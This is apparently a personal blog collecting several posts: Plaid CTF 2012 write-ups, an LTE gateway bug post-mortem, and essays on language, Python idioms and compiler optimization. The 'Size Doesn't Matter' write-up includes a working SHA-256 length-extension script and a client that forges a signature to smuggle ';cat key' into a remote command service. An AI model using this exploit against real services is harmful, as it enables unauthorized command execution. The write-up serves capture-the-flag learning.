Posterous theme by Cory Watilo

Plaid CTF 2012 - "Supercomputer"

Kinda late to the party with those four, but here goes. The supercomputer binary involved 4 challenges, retrieving 4 numbers out of a binary for 50, 50, 100, and 300 points respectively. Didn't solve them on time, but it's a good reversing challenge..

Supercomputer 1 [50] Pirating
Computing one big number is hard, but apparently the robots can do four? Please help us!
What is the first number?
main() is at 0x400674. A state vector is initialized, seen below:
Vector_init
and the fun begins. By running the executable you can see a "progress report" with dots and first thing we notice are calls to sleep(). Did I mention the progress is super slow? Apparently, you have to speed it up (?). Being the naive fellows we are, we initially just LD_PRELOADed them out, but the process kept slowing down, so we had to be clever. We nop the calls to sleep, and resort to callgrind, which shows us the (first) culprit:
First_offender
which is a particularly laid back way of performing addition (+1 in a loop). We patch it with the following (NASM syntax everywhere):

EDIT: Patches given in assembly have jumps relative to the address given at the start of each snippet; thank @osxreverser's .gdbinit for that. :-)

After the loop has terminated, there is an integrity check of the third state vector entry (done for all four keys, actually). If it passes, the concatenation of (state[0] + state[1]) and (state[2] + state[3]) is output as the first key, which is:
Yay! The first key is 414e0d423f5fcd195a579f95f1ff6525
For the key generation, there are multiple functions involved (there are jump tables at 0x601ce0 and 0x401808). However, we don't need to mess with all of them - just the very slow ones. The key update functions are selected with a congruence modulo relation (look for movabs & imul sequences in the disassembly, there are a handful and are used for other stuff as well).

For the second key, the slow function is at 0x400edc, and is doing a multiplication by addition. We patch it as well:

and we get:

Hooray! The second key is f811f0e8a1f9196e27eef9e23eff6367

Alright. For the third key, the slow function is at 0x4010b8, and it's tricky. After another slow multiplication, it performs a division by repeatedly adding a negative in two's complement number (0xfffffffef4143e05). We can do better than that:

which nets:

Hooray! The third key is c9e6d35ed6007b35f7d01a98f6d548fb

The last part is kind of crazy. After hopelessly trying to deduce what to optimize away in 0x400d18, which callgrind reports as the busiest bee in the hive, I decided to take a step back, to its callers. They are two, in a single function at 0x401330, which is in turn called by 0x4011be (via a jump table). If you notice the stack offsets at runtime, you'll see they operate on temporary key vectors and aren't used to update the original, as far as I could tell. They do go on for an obscene amount of iterations, though, so let's just skip them altogether:

and after a short while..

Congratz! The last key is f9b02fabc4b866288d7c4c5bbcd5507e

Huzzah.

Plaid CTF 2012 - "Size Doesn't Matter"

What an awesome CTF. The "Size Doesn't Matter" challenge read:

Size Doesn't Matter [250] Password Guessing
We found a pair of robot command execution services running at 23.20.239.9 ports 8888 and 8889. Can you break into it?

The first service, when poked, asked for a command and answered with the following:

Your verification string is valid for your command for 10 seconds: 60a33bc5e3be71846a60b2103e46cce3045e8380e04f9cd69e29c1c575284930
secret: XXXXXXXX
timecode: 12:32:3
command: ls
The second service requested something of the form (after an update of the challenge):
Please send command1;command2;command3::verification
One shall be enough. :-)

After playing a bit with it and seeing that the command input was stripped and filtered to only allow letters, we started fiddling with the token. Looks like SHA-256 in length, so assuming it is, it could be subject to a length extension attack.

Length extension attacks are basically a property of Merkle–Damgård construction. Think of it this way: a SHA-2 digest is essentially the internal function state after consuming the message, its padding (if any) plus the length in bits. If you wanted, you could grab it, initialize a SHA-2 implementation with it and the length of the processed message thus far, and continue hashing additional blocks. The end result is the digest of:
[ Initial message | 0x80 | Padding | Length | Concatenated message ]
Now as the commands were fed to bash by a Python script, concatenating a semicolon plus a 'cat key' will presumably get us where we want. The good folks at vnsecurity had already provided an implementation I modified. So off we go,

#!/usr/bin/env python
import sha256 # PyPy's sha256 module works.
import struct

class shaext:
    """
    Performs SHA-256 length extension.
    """
    def __init__(self, origtext, keylen, origsig):
        self.origtext = origtext
        self.keylen = keylen
        self.origsig = origsig
        self.addtext = ''
        self.init()

    def init(self):
        count = (self.keylen + len(self.origtext)) * 8
        index = (count >> 3) & 0x3FL
        padLen = 120 - index
        if index < 56:
            padLen = 56 - index
        padding = '\x80' + '\x00' * 63

        self.input = self.origtext + padding[:padLen] + struct.pack('>Q', count)
        count = (self.keylen + len(self.input)) * 8
        self.impl = sha256.sha256()
        self.impl._sha['count_lo'] = count
        self.impl._sha['count_hi'] = 0

        _digest = self.origsig.decode("hex")
        self.impl._sha['digest'] = [x for x in struct.unpack(">IIIIIIII", _digest)]

    def add(self, addtext):
        self.addtext = self.addtext + addtext
        self.impl.update(addtext)

    def final(self):
        new_sig = self.impl.hexdigest()
        new_msg = self.input + self.addtext
        return (new_msg, new_sig)

and then we fiddle with the two services:

import socket, time
import shaext

IP='...'
PORT1=8888
PORT2=8889
COMMAND=''

while True:
    sock_verifier = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_verifier.connect((IP,PORT1))
    COMMAND = raw_input('cmd? ')
    sock_verifier.send((COMMAND + '\x0a'))
    verification = sock_verifier.recv(256)
    sock_verifier.close()

    print(verification)
    token_begin = verification.find('seconds: ') + len('seconds: ')
    token_end   = verification.find('\x0a');
    token       = verification[token_begin : token_end]
    timecode    = verification[verification.find('timecode: ') + 10 : verification.find('timecode: ') + 17]

    extension = shaext.shaext(COMMAND, 8 + len(timecode), token)
    extension.add(';cat key')
    (new_msg, new_token) = extension.final()
    print('[+] New command: ' + new_msg)
    print('[+] New token  : ' + new_token)

    command_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    command_sock.connect((IP, PORT2))
    buf = new_msg + '::' + new_token + '\x0a'
    command_sock.send(buf)
    data_rcv2 = command_sock.recv(4096)
    print(data_rcv2)
    command_sock.close()

Which nets us the key:
my_hash_is_longer_than_your_hash

The ill effects of wonderful optimizations

The main point of this post involves assumptions.

As developers, we are led to believe that if our code passes certain tests, then it operates correctly under certain circumstances and/or conditions, aka. assumptions. And why shouldn't we be? the purpose of tests is verification of just that. However, as human beings faced with increasingly complex systems, we are also prone to extrapolation. I'm about to describe an incident in which the combination of the above facts ruined two weeks of ~20 decent people's lives.

First, a little background info. Get to Google and read up a little on what an MME, a S-GW and a P-GW (or PDN gateway) are in the context of LTE. Bearers (sessions) in LTE have a so called EPS Bearer ID, or EBI, which is assigned by the MME. It is contained in Create Session Request messages from MME to S-GW and is subject to the following restrictions:

  • It must be unique per bearer
  • It must be in the range of 5-15 (0-4 are reserved values)

Now, when a session creation is requested of the S-GW, it too must create a session with a P-GW. There's only a Create Session Request (or Proxy Binding Update if communication is done over PMIP, but that's not important) going back and forth between the S and P gateways in this case. The P-GW can be the one that provides better routing, one that is appropriate for a roaming user, a lightly loaded one in case others are overloaded, etc.

In comes a crucial optimization. The 3GPP has specified interfaces to/from all those boxes, but hasn't specified that S- and P-GW in particular have to be different boxes. Combining those two may lead to a cheaper deployment, or simpler network configuration - both those points are, of course, debatable. Let's say you take that approach with a combined SGW and PGW, not only on the same box, but also in the same process. Immediately, from a developer's point of view, many things are simplified - network latency doesn't exist, timeouts as well, the communication between SGW and PGW is greatly simplified, signalling costs are cut down, state tracking is also cut by half (well, maybe) and so many others.

Now, the architecture of your LTE network hasn't changed, the way other network elements (MME, PCRF, AAA servers, PDNs) interact with your backplane hasn't changed, end-to-end procedures haven't changed. Is anything different, really? Yes.

If you haven't cringed by the time I mentioned all the things the combined SAE-GW simplified over separate SGW/PGW, then you are going to be genuinely surprised. For a roaming user, when your SAE-GW is acting as its S-GW, all those advantages mean nothing because you still have to establish the session with the PDN gateway of the roamer's home network. Et voila, you have greater network latencies and signalling costs again.

It is important not to let developers become detached from the final product. When we develop and test in internal networks, all the cruel obstacles that the real world puts in front of us are conveniently absent. Packet loss, latency, unreliability and congestion. And our assumptions might change. If it passes the tests (artificial as they may be), it works, right? Yes, you will have multiple levels of testing and verification, but I'm talking about developers. Developers don't, as a rule of thumb, do network verification.

So, to the incident that burst our particular bubble: Assume a telecom provider using your SAE-GW faces an issue with certain subscribers; they can't seem to perform a complete LTE attach procedure. Their MME sends a Create Session Request, your SAE-GW processes and accepts it & sends back a successful reply. Then the Modify Bearer Request (2nd part of LTE attach between MME and S-GW, necessary to send data) is sent but is never acknowledged. After a series of timeouts, the MME has no choice but to delete the session. The subscriber retries, ad infinitum, to no avail. An important detail to mention is that the provider only supports a single default bearer, i.e. all sessions (per subscriber, of course) were assigned an EBI of 5. Debugging shows the following symptoms:

  • Each of the affected subscribers had a session hanging on; whether it hadn't been deleted properly or your box hadn't correctly stopped tracking its state was unknown, mostly because the problem must've started a very long time before any symptoms begun to show.
  • The SAE-GW is frequently paging the subscriber's UE, and the MME responds with a 'Context not found' error for that session/subscriber.
  • An internal queue for ongoing procedures (not necessarily end-to-end) for that subscriber's hanging session has filled up. We hadn't thought of putting any debugging info there (what procedures are there? for how long?).
  • During session creation, your GW detects an EBI collision and tries to delete the hanging session. That procedure has to be placed in the aforementioned queue, but without space for it, it cancels itself and dies. The creation "succeeds", however.

After a good two weeks failing to reproduce this it turns out that half of the symptoms were irrelevant (but had to be dealt with, nonetheless). Here's the scenario that led to the hanging session:

  1. The MME performs an complete LTE attach for a given EBI.
  2. The MME performs at least two more session creations for the same EBI.
  3. At this point, when we detect an EBI collision and try to delete the hanging context, we must also inform the respective P-GW.
  4. After the P-GW responds, we continue with deleting our own session, reply to the MME, life goes on.

Now, step #3 is dangerous. We fell into the trap of not accounting for that step, or failing at it in particular. If the reply from the P-GW for some reason didn't reach us in time or at all (recall that the P-GW may be remote, and not part of the same process), our procedure handling mechanism would not continue with processing the session deletion. Resources wouldn't be freed, queues fill up, etc.

The solution is quite simple. Change the collision handling (when trying to establish a new session that collides with an old one) to be asynchronous; if an EBI collision is detected, the old procedure is interrupted and cancelled. Also queues had to be managed a little better, with a maximum lifetime for every item inside them. Better debugging logs, and so forth.

The root of what caused all this is followed up with our customer. As far as I'm concerned, however, it's not relevant; what's important here is that assumptions about our test setups crept up on us and we were careless enough to forget about the real world.

Disclaimer: Certain details, however crucial, have intentionally been left out to protect the innocent. :-)

Language

You might have observed a deterioration in ethics, a deterioration in etiquette, naturally accompanied by a deterioration in language. From the heated and emotionallly charged language used in a football stadium to the wooden language of modern day political correctness, I for one have, and I find it's increasingly infuriating to have to argue against such language that's constantly trying to patronize and manipulate me while letting someone else weasel their way out of a situation.

Such language just contributes to a deterioration in communication ("well why didn't you say that?"), and I find that it's beginning to become a problem for me. Allow me to illustrate with a few phrases from the last three days:

  • "You may consider the matter resolved" instead of "The matter has been resolved", coming from a building manager
  • "If we collapse, we will have fixed nothing, therefore we must vote in favour of X" instead of "If we are to vote against X, we must try to not collapse and work to fix..", coming from a party leader
  • "Why, no doubt, this [participation in the €] is the greatest and final challenge of today's decision", a total non-sequitur, coming from a prime minister
  • "[We failed to reach milestone X in time] Thank you for your support and committed work so far", you can venture a guess as to which people might've said that over the years
  • "Restructuring" as a euphimism for "firing staff"

And, such is the deterioration in both education as well as in culture, that we all get sucked into this vortex of implication. I feel I've fallen into that trap quite a few times, without conciously realising it. The reasons behind the use of such language may not be always clear, but I'm sure you'd agree that they don't exactly inspire confidence and trust. A hidden agenda? lessening the blow of a significant announcement? avoiding responsibility? or just the lack of a solid argument? Whatever they may be, I find I don't like a society that operates based on assumptions, mistrust and indecency.

However, it has become increasingly commonplace to commend honesty, decency, and being up front. Am I alone in thinking that it should not be so? Have we really come to the point where just doing your job deserves praise? Is corruption so widespread that we must celebrate for every single one worker and official that doesn't succumb to it?

Do similar issues exist with programming languages? I don't know that many of them for my comments to bear any significant weight. The ones I do know, however, (and they're a handful) don't weasel out in obvious ways. On the other hand, this is not so much an issue of the language but how its users shape it. And if you think about it that way, maybe you'll come to interesting conclusions next time you review your code.

zip(), iter(), and spacing out

(I was thinking about putting this under "voodoo", but it's just idiomatic code. It doesn't look so hacky to me anymore I guess :-)

I had to explain the following piece of code today to a bunch of people:

_, _, _, _, _, _, _, _ = [int(g) for g in map(''.join, zip(*[iter(timestamp)]*2))]

It unpacks pairs of values which are weirdly packed in a string, which are then used with the datetime module. Many an eye glazeth over the map(...) part, so here's the explanation:

  • iter(s) returns an iterator over a sequence s
  • [s] * n is a list containing n quantity of s, ie. n references to the same object
  • *arg unpacks a sequence into arguments for a function call
  • zip(...) returns an iterator of tuples, where the i-th tuple contains the i-th element from each of the argument sequences or iterables
  • map(f, i) applies the function f to all items in iterable i and yields the results

The only thing that may still be somewhat hidden from plain sight is this: when the same iterable is passed to zip(...) multiple (n) times, it yields groups of n elements from that iterable. If you take a look at what zip(...) is equivalent to in the Python documentation, you can see that next(...) is called on the same iterator multiple times in order to yield a single tuple, and that's the obscure detail that the snippet above is exploiting.

That is all.

professional aspirations

(prospective employers, take notes)

  • getting a desk where no one can see my monitors except me
  • bosses that don't view me as hired help
  • compensation that reflects the effort I put in my work
  • being encouraged to publish my research
  • instead of keeping it a secret because "it might hurt our public image"
  • having colleagues that I can learn from and be challenged
  • management that actually tries to solve problems

..but i'm told those are too much to ask. Thoughts?

in Soviet Russia, the program compiles you!

Sometime during the past X years, "modern software engineering" (there's a catchphrase if I ever heard one) has shifted its focus quite a lot. We pushed the hardware to its limits with crazy (literally) optimizations, and the hardware has rewarded us with billions of clock cycles per second and dozens of cores and hardware threads at our disposal, to use as we see fit. We then honed our tools (compilers) to do the dirty work for us, because (premature) "optimization is the root of all evil". So we demean the poor fellas that do the research for an efficient algorithm, we mock the poor sods who see optimization opportunities in processing small datasets, we elevate the compiler developers to demigods who speak in the incomprehensible language of intermediate representation and we settle for bragging about our elegant code (which is still full of fucking punctuation) on top of somebody else's 70 MB TCP stack.

During the course of those, fictitious as they may be, events we have elevated our reliance to compilers to an almost religious level. We have even started debates like "gcc vs LLVM", and don't you fucking dare to get me started about how good icc is.

The fact of the matter is, though, a compiler can't produce good code if the programmer doesn't know how to use it. A compiler takes your high level code and converts it to machine code; I cannot assume you know this. You can imagine the process like this:

  • Parse the code and construct an intermediate representation
  • Optimize the intermediate representation
  • Generate the platform-specific object code

Code optimization is the result of extensive static program analysis. An important part of it is dead code elimination (DCE). In its simplest form, DCE removes code which can never be executed. A more aggressive form of DCE may also target code which does not affect the outcome of a function, such as the following, where the loop's result is never used:

void add(void)
{
    int x = 0;
    for(int counter = 0; counter < END; ++counter)
        x += counter;
}

Of course, this is a simplified example, and if all there was to programming was simple examples like these, we wouldn't need the monstrous codebase of gcc in the first place. Why do you care about this? Because the simplest choices you make will have an effect on the generated code for your programs.

Function Calls

Typically, since compiling is a very hard and resource consuming task, it is restricted in scope. Sometimes in single functions, or in a single translation unit (in C terms). Compilers also, as a rule, do not perform whole program optimizations. We can already see the impact from splitting code into different translation units (to separate concepts, functionality, and also increase readability, maintainability, etc). In the simplest of cases:

extern int val(int);
void add(void)
{
    int x = 0;
    for(int counter = 0; counter < END; ++counter)
        x += val(counter);
}

where a different translation unit contains:

int val(int n)
{
    return n;
}

the programmer, after a glance at the code, is aware of the simplicity of the example. The compiler, however, is royally screwed. It cannot determine if val() has a side effect, so it has to be extremely conservative during DCE and the loop cannot be optimized away. This is a substantial slowdown.

I know that you won't trust any numbers I carefully lay out here, so go measure it for yourselves. Use something like PAPI instead of time, OK?

Globals

If you thought global variables were a bad thing, try profiling this:

for(int i = 0; i < N; ++i)
    mresult[i] = matrixa[i] + matrixb[i];

when the arrays are local, as well as global. For this rudimentary example, you can get a slowdown of as much as 5 times when the arrays are global. That is again because of their scope; the compiler cannot assume the result of the loop is not used in other translation units when whole program analysis is not enabled. If you are particularly argumentative, you could take a look at the generated assembly, and observe that even if you do not declare stuff as volatile, the compiler will not place them in registers (for the global case). You could try blaming gcc, but I don't know how far that would take you.

Link order

gcc and icc are both sensitive to the compilation & link order. For large programs, whole program analysis (sometimes even the "normal" optimization phase) consume incredulous amounts of memory. I'm guessing that things like caching and branch prediction are also affected. Visual Studio optimizes the project build order by default, and it allows you to manipulate it.

And last but certainly not least,

Pointers

Here's a loop you'll find in several media manipulation software applications:

for(int i = 0; i < N; ++i) {
    *a++ = *b++ + *c++;
}

Where do a, b, and c point to? You do not know. You cannot know. You might, after careful inspection of the code, conclude that all the loop does is vector addition of two arrays onto a third, all of them non-overlapping. Pointer aliasing (the fact that a memory location or object may be referred to by different names) prevents the compiler from knowing so. The restrict keyword can limit the effects of pointer aliasing (as is typically used in memcpy, for instance), and help the compiler generate better code, perhaps by vectorizing accesses to non-overlapping arrays. Compare the run time of the above loop when a, b, c are restricted and when they're not. A significant difference, indeed.

To conclude,

know your tools. Using a language like C or C++ does not automagically yield results. It might actually yield worse results if you don't know what you're doing.

creatively reinventing the wheel

The past two weeks have been a series of minor revelations for me.

Thanks to things like Twitter (social blogging? how do they call it today?) and Co. we can bitch and moan about our problems on an international scale. In the last two weeks I literally had no problems other than a) "Mom, where did you put the fucking coffee now?" and b) "Dude, just make some time so I can see you before I head back to Athens", so I could just bitch and moan about your problems.

I also had this "discussion" with a priest (read: had to stand listening to his monologue) who had moral reservations about the field I work in. I wish it were as funny in English as it was in Greek, I'd translate it and put it here. But I digress.

I have since concluded that bitching must be mostly good. If you're intelligent about it, you put a sarcastic or funny spin to it to lessen the blow and serve it cold, to millions of twitter users or your significant other. The exact opposite of a workplace where you'd embroider your bitching with "hard facts" and words like "risk" or "impact", to actually draw blood, induce guilt or even worse, get someone's attention. We're so into double standards it's actually a little funny. Ask the Americans, if they haven't gone mad already.

Bitching can give you a sense of direction. What might be wrong, what might be right. Once I sat and bitched at the Python multiprocessing module for not giving me a way to set process priorities. Was it really its fault or its writers'? Was it done right and if so, who should have I asked for it? Should multiprocessing provide an abstraction for it anyway? Those questions are the only things important about this example. The fact that I can set no process priorities through multiprocessing is, well, fucking inconsequential is what it is. The really interesting stuff comes from asking ourselves those questions, and sometimes taking the time to think about them. The answers don't matter, either, but that's mostly philosophical I suppose.

Other than that, I've organized my shit, coded a bit, hacked the auto-update software on my parents' TV (sorry, dad) and read a lot. Actually finished 7 books (mostly English literature) and a bunch of articles and papers I had in the purgatory, all great stuff. Watched the 28th CCC, amazing people doing amazing things. Composed a little bit, maybe this time I'll actually put something out there after recording instead of deleting it. Considered job offers and turned them down (such an ego boost! not).

Hopefully this year I'll be able to concentrate more on things instead of just letting them flow. :-)